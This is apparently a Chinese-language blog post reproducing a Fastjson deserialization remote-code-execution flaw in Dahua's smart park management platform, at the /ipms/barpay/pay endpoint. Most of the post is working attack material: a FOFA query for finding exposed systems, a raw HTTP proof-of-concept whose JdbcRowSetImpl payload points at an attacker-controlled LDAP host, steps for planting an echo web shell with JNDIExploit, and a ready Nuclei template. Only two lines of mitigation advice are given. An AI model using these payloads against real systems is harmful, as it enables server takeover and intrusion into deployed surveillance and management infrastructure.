大华智慧园区综合管理平台 /ipms/barpay/pay RCE漏洞复现

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

大华园区综合管理平台可能是一个集成多种管理功能的平台,例如安全监控、设备管理、人员管理等。这样的平台通常有助于提高园区运营效率和安全性。

大华园区综合管理平台/ipms/barpay/pay,deleteFtp 接口处存在Fastjson反序列化漏洞 恶意攻击者可能会执行恶意代码,造成服务器失陷

大华智慧园区综合管理平台 /ipms/barpay/pay RCE漏洞复现_第1张图片

Ⅱ、fofa语句

app="dahua-智慧园区综合管理平台"

Ⅲ、漏洞复现

POC

POST /ipms/barpay/pay HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
cmd:whoami
 
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://your-dns", "autoCommit": true}

1、构建poc

大华智慧园区综合管理平台 /ipms/barpay/pay RCE漏洞复现_第2张图片

2、查看DNS记录

大华智慧园区综合管理平台 /ipms/barpay/pay RCE漏洞复现_第3张图片

3、利用JNDIExploit-1.4-SNAPSHOT.jar工具打入回显马执行RCE 

 大华智慧园区综合管理平台 /ipms/barpay/pay RCE漏洞复现_第4张图片

Ⅳ、Nuclei-POC

id: Dahua-ipms-Fastjson
info:
  name: 大华园区综合管理平台/ipms/barpay/pay,deleteFtp 接口处存在Fastjson反序列化漏洞 恶意攻击者可能会执行恶意代码,造成服务器失陷
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="dahua-智慧园区综合管理平台"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /ipms/barpay/pay HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/json
        Accept-Encoding: gzip
        Connection: close
        
        {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://{{interactsh-url}}", "autoCommit": true}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and

大华智慧园区综合管理平台 /ipms/barpay/pay RCE漏洞复现_第5张图片

Ⅴ、修复建议

1、通过防火墙等安全设备设置访问策略;

2、设置白名单访问。如非必要,禁止公网访问该系统。

你可能感兴趣的:(安全,web安全)